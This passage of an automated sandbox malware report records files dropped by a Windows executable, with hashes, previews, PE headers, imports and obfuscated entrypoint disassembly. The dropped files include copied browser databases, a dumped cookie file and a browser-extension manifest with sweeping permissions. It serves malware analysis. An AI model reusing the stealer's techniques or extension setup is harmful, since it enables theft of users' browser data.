                                                                                                                                                            SSDEEP:3072:oqgVLOwI8m5A7LLrepqxi8RVUbq+jLJI2naX3MGYn9dL7yP:VgZOwI5AnL2RgUbTC29GYTC
                                                                                                                                                            MD5:7CC103F6FD70C6F3A2D2B9FCA0438182
                                                                                                                                                            SHA1:699BD8924A27516B405EA9A686604B53B4E23372
                                                                                                                                                            SHA-256:DBD9F2128F0B92B21EF99A1D7A0F93F14EBE475DBA436D8B1562677821B918A1
                                                                                                                                                            SHA-512:92EC9590E32A0CF810FC5D15CA9D855C86E5B8CB17CF45DD68BCB972BD78692436535ADF9F510259D604E0A8BA2E25C6D2616DF242261EB7B09A0CA5C6C2C128
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ......................>.......................................................|.......|...................................................................................................................................................................................................................................................................................................................................................................................................................................................d.......D....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...c...E...F...G...H...I...J...K...L...b...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a.......e.......w.......g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...x.......y...z...
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\xldl.dat
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:7-zip archive data, version 0.3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1397922
                                                                                                                                                            Entropy (8bit):7.999863097294012
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:24576:juyI43LaCG/Ns1izTSVSRvLQtdMRATA0wpJu4cvT8Ptj2JwqXN25MB9urh0w6q:jut47aCGVSVSRvLEdxA0acojEwqXTcac
                                                                                                                                                            MD5:18C413810B2AC24D83CD1CDCAF49E5E1
                                                                                                                                                            SHA1:ACE4A5913D6736C6FFB6666B4290AB1A5950D6FF
                                                                                                                                                            SHA-256:9343334E967D23D84487B28A91E517523B74C6ADDF4654309EDEE98CC0A56353
                                                                                                                                                            SHA-512:FEFD6B65CBB61AC77008155F4CB52221C5C518388D429FE6C11CCB2346FB57991D47B121A024AC1DDED312C1B7646744066092A8A04D5A81BFE56E4A1D9C2EF5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 7z..'.....C.^T......$.......:_c..&..p.........../D.N..MhC.T.....n.......L.V187y.].'.U.G6P`}6._..f..;..<.....G./..~..3...^.|.=.G.6..5.!SK.$.RdO....2.C-^....$Y..Ah.L8./....h$......\..~...b.].U...4..'dIN^.?6.r....,<K0......^.Vg.:j. &j..{...X.K..5*zLF.W-.Z9..<......u0O../..s+N......1........r$h;3.}L.p.......~|J^.*YFZX\.g.H.....vbz..E'lhRH..@.p...+.3..`Y:.../......J.3<...C.......5.'.._p...<-.f~..]E..N..3.....s..Y..r..y....V.p.....MrD.....W2...Y:..G..bkq...n..o..>W..\A>Z....,^+.j..Mb}.S....._3^.....f...-wD?.....r...}?.x..#'...Ru<....I.\.f.d /p.r2.Z.JY.]....9....1.......).....l.........\.:..Y....q..!....N\..P....#%...1...%.v. J4......^._.1&}b,..VZ#.j...i......<...\$..0.....t<..[.....|..n1...Y.i4\.ZN..V....U)...|.!..vj...7P,)6..N.,.>.e:.f.,.z....v.#AQ...8M.X.)........r .H.Dz.....YY -..).(..z..0E.Y2.".".<.lL..{Z...+.0.........8v../..1A`..xx..8.HY....y.I..d.e;..............'D.W.......o2............./q...sx....>..7.fk._.g`.o.".F24.Mvs......)\......^...d.&.
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\xldl.dll
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):293320
                                                                                                                                                            Entropy (8bit):6.347427939821131
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:qUWWnyka1c7u2SbdYUUvZjWj9gj0U+zlVKy5:qvKa+7u7bqUoZjW5gj0U+z+Y
                                                                                                                                                            MD5:208662418974BCA6FAAB5C0CA6F7DEBF
                                                                                                                                                            SHA1:DB216FC36AB02E0B08BF343539793C96BA393CF1
                                                                                                                                                            SHA-256:A7427F58E40C131E77E8A4F226DB9C772739392F3347E0FCE194C44AD8DA26D5
                                                                                                                                                            SHA-512:8A185340B057C89B1F2062A4F687A2B10926C062845075D81E3B1E558D8A3F14B32B9965F438A1C63FCDB7BA146747233BCB634F4DD4605013F74C2C01428C03
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q...5.[5.[5.[&..[7.[..[/.[...[..[...[4.[..[1.[&..[7.[...[?.[5.[..[...[0.[...[p.[...[4.[...[4.[...[4.[Rich5.[................PE..L...V..S...........!.....P...................`...................................................................... ...d... ........ ..@............`.......0...&.. b...............................................`...............................text....G.......P.................. ..`.rdata...w...`.......`..............@..@.data....4....... ..................@....rsrc...@.... ......................@..@.reloc...C...0...P..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Web Data1615173777540
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):73728
                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\crx.7z
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:7-zip archive data, version 0.3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36105
                                                                                                                                                            Entropy (8bit):7.994610469125073
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:gzRRD+bIdsGw/mJaXyGteg6/Ys175i+SQwcvDcViSvXhqisEKXz:gzRN5sG2mJjGeg6/J7VSVWDcLvxqisEU
                                                                                                                                                            MD5:DAFDD7237BA10D0C91295CD1C15749B2
                                                                                                                                                            SHA1:45D55EE145BC71921271BA5493F13D3428589D4D
                                                                                                                                                            SHA-256:B0D675F1E5D4F772CD90E59A2D64D24CF682A1C966FECCA50C87C985F64E4136
                                                                                                                                                            SHA-512:50FEF821BF531A439CD00099EE90C938AF3D6A3FF71C8CD57D31D8CA9F5FF68E3B9D40118AC038A1C6BD7ADD43D7B35759376BBD4BEAF592359A1EF0A86E86B5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 7z..'.....9........$........^x..D...z'...P.....P'.B..a.Ik.?h.O (<M..A...S...>l...[.y...E.BF.@.*w..43..{.b.G...(...=.Q.2'.9.l%..~.4..`~.uX6.....S.....T..K.\)}..,+>\YeFp-...<.Otpw......#.NV.........~.;.(..-.F~...R.$s..m..}/.>..x..>..Osw..m..A.O.h].dWz1.mf.-..'tI.H.So.$.~.7um..\[...-.m.wY.....0.`.......y...;......-..w..L".T.W..!...`6....U........n.(...z..".^...R..b.G.;.W....k2..|.jS...m.....M.jZ5W.>...j.....{T.H....Q.?.Ybun.......gPd....E.<k.Z.eA".k.G.......6'.a.X >o.D4.r...E...N.....w....S.........5..[O.=.?..Q..Q.,.."..@..5./.V...."[.K.:..V.......L..{.XYWU...^...........2x.E.b..E....1.....#Gl.3...2.W[X9.g.X`.u$fZ.o....z..>hY.?..g,T}S.q+........eT..0e..&..`2...[.s...{.._.h.C7c.zH.......!...'!`..].m..8V.-".....nVa....^...Tx/..........4.?.v.Z.....o......C.cWt8-.....^|..d..He...!.7....T.X..?.d0..ly...T..u......,L..S1.a.....:..3Z;*...M.73.......`....a....`C~}.r.&FOY..aA.w..y..5..K@.N..........0$.>..I.@#.:...q1...H.S...|....3...X.E.N.I7...]".50.6...or
                                                                                                                                                            C:\Users\user\AppData\Local\crx.json
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1981
                                                                                                                                                            Entropy (8bit):5.365969892012237
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Y4xeW8t8pzxeW8t8poi5a+Q8EIelc1FE8t8RcvPQ:VxhxmiAvMQ
                                                                                                                                                            MD5:B5CEED4A6FA3F501787DE10B4CB02EEE
                                                                                                                                                            SHA1:F09C0A8CA18D825D6CE6F192090EBD0659C7321B
                                                                                                                                                            SHA-256:749F47181C95AD070353887E477542AAE4AE41F2802CCCB8312F429767254CB8
                                                                                                                                                            SHA-512:02B7DE9D7FDAB98F63837A5E98FA0DCCC90FEBB45EAC1CD13523315083D209FFD748513BF1AF5562F10C75E6C821D9B4003EFF3D13CD4CC8B2D76688682E95D6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: {"active_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"creation_flags":1,"extension_can_script_all_urls":true,"from_bookmark":false,"from_webstore":false,"granted_permissions":{"api":["activeTab","browsingData","contentSettings","contextMenus","cookies","downloads","downloadsInternal","history","management","privacy","storage","tabs","topSites","webNavigation","webRequest","webRequestBlocking"],"scriptable_host":["http://*/*","https://*/*"]},"initial_keybindings_set":true,"install_time":"13243077899481747","location":1,"manifest":{"background":{"persistent":true,"scripts":["jquery-1.8.3.min.js","background.js"]},"browser_action":{"default_icon":"icon.png","default_popup":"popup.html","default_title":"book_helper"},"content_scripts":[{"all_frames":false
                                                                                                                                                            C:\Users\user\AppData\Localwebdata1615173777790
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):73728
                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Roaming\1615173766196.exe
                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):103632
                                                                                                                                                            Entropy (8bit):6.404475911013687
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:TmNElglU+fGVknVahVV8xftC9uYRmDBlwZ3Y12wk7jhqnGbi5A:TCUt+fGmETSRtk92wZ3hb7jh76A
                                                                                                                                                            MD5:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                            SHA1:B5EE276E8D479C270ECEB497606BD44EE09FF4B8
                                                                                                                                                            SHA-256:6562BDCBF775E04D8238C2B52A4E8DF5AFA1E35D1D33D1E4508CFE040676C1E5
                                                                                                                                                            SHA-512:EA3F0CF40ED3AA3E43B7A19ED6412027F76F9D2D738E040E6459415AA1E5EF13C29CA830A66430C33E492558F7C5F0CC86E1DF9474322F231F8506E49C3A1A90
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..s.i. .i. .i. .f. .i. .f. .i. .J. .i. .J. .i. .i. .h. .J. .i. (.. .i. (.. .i. (.. .i. Rich.i. ................PE..L....S.Z..........................................@..................................................................................@...W...........f...............................................................................................text............................... ..`.rdata...........0..................@..@.data........ ......................@....rsrc....W...@...X..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Roaming\1615173766196.txt
                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\1615173766196.exe
                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):30696
                                                                                                                                                            Entropy (8bit):3.716504685707176
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:b3I3K3CeQ3LE35d3qv9T3qZ3ogYd3J3KYEI6yB2ArMEYrxfelEnxYWM5j2j6hlkg:bYasIDQBc4gYdZ6YEIPLYdyMem6hlkSx
                                                                                                                                                            MD5:7483339EB59652ED25197A4E6CF8CEC7
                                                                                                                                                            SHA1:2559FAFB2A8C7C57D99AECE449E2095E7A1BCBD2
                                                                                                                                                            SHA-256:C691B4BE6B277DC74F9851C8A553227C0BAE56E663EE27751CC259686157DDFA
                                                                                                                                                            SHA-512:797C940274088AFF38F7F6606684597093E7159EBA337E1E6D758095C86AF4DC0ACDF1FE934CDDD42E17056023522D7A7F602BEAE0B8C55C64718F992439A25F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ..[.........{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.1.:.3.6.:.2.2. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.2.:.0.6.:.2.3. .P.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.i.c.r.o.s.o.f.t...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".M.S.0.".,.....".V.a.l.u.e.".:.".9.f.5.b.a.a.3.6.e.5.b.8.4.d.0.4.a.0.c.b.3.8.2.b.f.8.3.2.8.c.8.2.".,.....".S.e.c.u.r.e.".:.".N.o.".,.....".H.T.T.P. .O.n.l.y.".:.".N.o.".,.....".H.o.s.t. .O.n.l.y.".:.".N.o.".,.....".E.n.t.r.y. .I.D.".:.".6.".,.....".T.a.b.l.e. .N.a.m.e.".:.".C.o.o.k.i.e.E.n.t.r.y.E.x._.8.".....}.....,.....{.....".M.o.d.i.f.i.e.d. .T.i.m.e.".:.".6./.2.7./.2.0.1.9. .1.1.:.3.6.:.2.2. .A.M.".,.....".E.x.p.i.r.e. .T.i.m.e.".:.".6./.2.6./.2.0.2.0. .1.1.:.3.6.:.2.3. .A.M.".,.....".H.o.s.t. .N.a.m.e.".:.".m.i.c.r.o.s.o.f.t...c.o.m.".,.....".P.a.t.h.".:."./.".,.....".N.a.m.e.".:.".M.C.1.".,.....".V.a.l.u.e.".:.".G.U.I.D.=.6.1.3.2.9.2.3.c.e.0.7.f.4.d.d.5.9.1.6.c.7.c.5.b.c.1.7.c.e.f.8.9.&.H.A.S.H.=.6.1.

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Entropy (8bit):7.9530465246504525
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:IpB8f8qwze.exe
                                                                                                                                                            File size:4882440
                                                                                                                                                            MD5:1b59fc1a89c1bc88ea4e1b26da579120
                                                                                                                                                            SHA1:6d1eb3583826aa70f437aba38beee8b787c2da7f
                                                                                                                                                            SHA256:6a9b454b620677ea11f4f69156969468b0f43ebdfe27dabfb0cf16572f9379eb
                                                                                                                                                            SHA512:9dcde0a9f29d4a68697b9fd2c167c5fc468c5c315b12e769a2f4fc72519996e6e8219fc9386e4e710cc88f12eb43973e79193bf6ef7c755d923f50889344e703
                                                                                                                                                            SSDEEP:98304:+PyrN2onLMeaojsO6QlbaRof/myjtFjhr/LS:+6hV4eDQO6QlWRoWyjt5hrG
                                                                                                                                                            File Content Preview:MZ......................@..................................................L.!This program cannot be run in DOS mode....$..........U..e...e...e.d1....e.d1....e.d1....e.......e.......e...d...e.70....e.70....e.......e.70....e.Rich..e.................PE..L..

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:51444454386c194d

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x4267a5
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:true
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                            Time Stamp:0x52974FC4 [Thu Nov 28 14:14:28 2013 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:5
                                                                                                                                                            OS Version Minor:1
                                                                                                                                                            File Version Major:5
                                                                                                                                                            File Version Minor:1
                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                            Import Hash:67715e556e3a78ea78c756db800102a3

                                                                                                                                                            Authenticode Signature

                                                                                                                                                            Signature Valid:
                                                                                                                                                            Signature Issuer:
                                                                                                                                                            Signature Validation Error:
                                                                                                                                                            Error Number:
                                                                                                                                                            Not Before, Not After
                                                                                                                                                              Subject Chain
                                                                                                                                                                Version:
                                                                                                                                                                Thumbprint MD5:
                                                                                                                                                                Thumbprint SHA-1:
                                                                                                                                                                Thumbprint SHA-256:
                                                                                                                                                                Serial:

                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                Instruction
                                                                                                                                                                push ebp
                                                                                                                                                                mov ebp, esp
                                                                                                                                                                sub ebp, 18h
                                                                                                                                                                mov dword ptr [ebp-14h], 004267A5h
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CBEh
                                                                                                                                                                call edi
                                                                                                                                                                call esi
                                                                                                                                                                mov esp, ecx
                                                                                                                                                                mov edx, dword ptr [ebx]
                                                                                                                                                                mov esp, esi
                                                                                                                                                                mov ecx, dword ptr [esi]
                                                                                                                                                                popad
                                                                                                                                                                push 00000004h
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CBDh
                                                                                                                                                                mov ecx, dword ptr [edx]
                                                                                                                                                                mov ebx, dword ptr [esp]
                                                                                                                                                                mov ebp, esp
                                                                                                                                                                call ebp
                                                                                                                                                                mov eax, ecx
                                                                                                                                                                popad
                                                                                                                                                                mov eax, 00426B27h
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CC3h
                                                                                                                                                                mov esp, edi
                                                                                                                                                                popad
                                                                                                                                                                mov esi, edx
                                                                                                                                                                mov esi, ebp
                                                                                                                                                                call esi
                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                mov ecx, dword ptr [ebx]
                                                                                                                                                                mov ecx, eax
                                                                                                                                                                inc ebx
                                                                                                                                                                popad
                                                                                                                                                                push eax
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CC5h
                                                                                                                                                                mov eax, ecx
                                                                                                                                                                mov edi, ecx
                                                                                                                                                                mov eax, esi
                                                                                                                                                                mov edx, dword ptr [esi]
                                                                                                                                                                mov ecx, dword ptr [esp]
                                                                                                                                                                mov ecx, dword ptr [esp]
                                                                                                                                                                mov ebp, ecx
                                                                                                                                                                mov eax, dword ptr [esp]
                                                                                                                                                                popad
                                                                                                                                                                push 000013C5h
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CBBh
                                                                                                                                                                pop edx
                                                                                                                                                                mov edi, edx
                                                                                                                                                                mov edi, ebx
                                                                                                                                                                idiv ecx
                                                                                                                                                                inc dword ptr [ebx]
                                                                                                                                                                popad
                                                                                                                                                                push 0042735Bh
                                                                                                                                                                pushad
                                                                                                                                                                xor ebx, ebx
                                                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                                                pop ebx
                                                                                                                                                                cmp ebx, 04h
                                                                                                                                                                jne 00007F2D58A40CC2h

                                                                                                                                                                Rich Headers

                                                                                                                                                                Programming Language:
                                                                                                                                                                • [RES] VS2012 UPD1 build 51106
                                                                                                                                                                • [C++] VS2012 UPD1 build 51106
                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                • [LNK] VS2012 UPD1 build 51106

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x543640x12c.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000xa954.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x16ac700x2398
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x670000x3660.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x3b4f00x38.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x53cd00x18.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x53c880x40.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x3b0000x474.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x395c40x39600False0.545394199346data6.59163014971IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rdata0x3b0000x1ac6e0x1ae00False0.293968023256data4.98279190668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0x560000x30740x1000False0.220947265625data2.65734870488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .wixburn0x5a0000x380x200False0.109375data0.592250883662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .tls0x5b0000x90x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0x5c0000xa9540xaa00False0.245909926471data4.45285297412IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .reloc0x670000x48e20x4a00False0.00216427364865data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                                RT_ICON0x5c2080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                RT_ICON0x5c6700x10a8dataEnglishUnited States
                                                                                                                                                                RT_ICON0x5d7180x25a8dataEnglishUnited States
                                                                                                                                                                RT_ICON0x5fcc00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                RT_MESSAGETABLE0x63ee80x21d4dataEnglishUnited States
                                                                                                                                                                RT_GROUP_ICON0x660bc0x3edataEnglishUnited States
                                                                                                                                                                RT_VERSION0x660fc0x3c0dataEnglishUnited States
                                                                                                                                                                RT_MANIFEST0x664bc0x496XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminatorsEnglishUnited States

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                ADVAPI32.dllOpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegCloseKey, RegQueryValueExW, RegDeleteValueW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, OpenSCManagerW, OpenServiceW, QueryServiceStatus, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, RegOpenKeyExW, QueryServiceConfigW
                                                                                                                                                                USER32.dllGetMessageW, PeekMessageW, PostMessageW, SetWindowLongW, PostQuitMessage, DispatchMessageW, DefWindowProcW, RegisterClassW, UnregisterClassW, CreateWindowExW, LoadCursorW, MessageBoxW, LoadBitmapW, TranslateMessage, GetWindowLongW, IsWindow, MsgWaitForMultipleObjects, WaitForInputIdle, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, GetCursorPos
                                                                                                                                                                OLEAUT32.dllSysFreeString, SysAllocString, VariantInit, VariantClear
                                                                                                                                                                GDI32.dllGetObjectW, StretchBlt, SelectObject, DeleteObject, CreateCompatibleDC, DeleteDC
                                                                                                                                                                SHELL32.dllShellExecuteExW, SHGetFolderPathW, CommandLineToArgvW
                                                                                                                                                                ole32.dllCoTaskMemFree, CoInitializeSecurity, CLSIDFromProgID, CoCreateInstance, StringFromGUID2, CoInitialize, CoInitializeEx, CoUninitialize
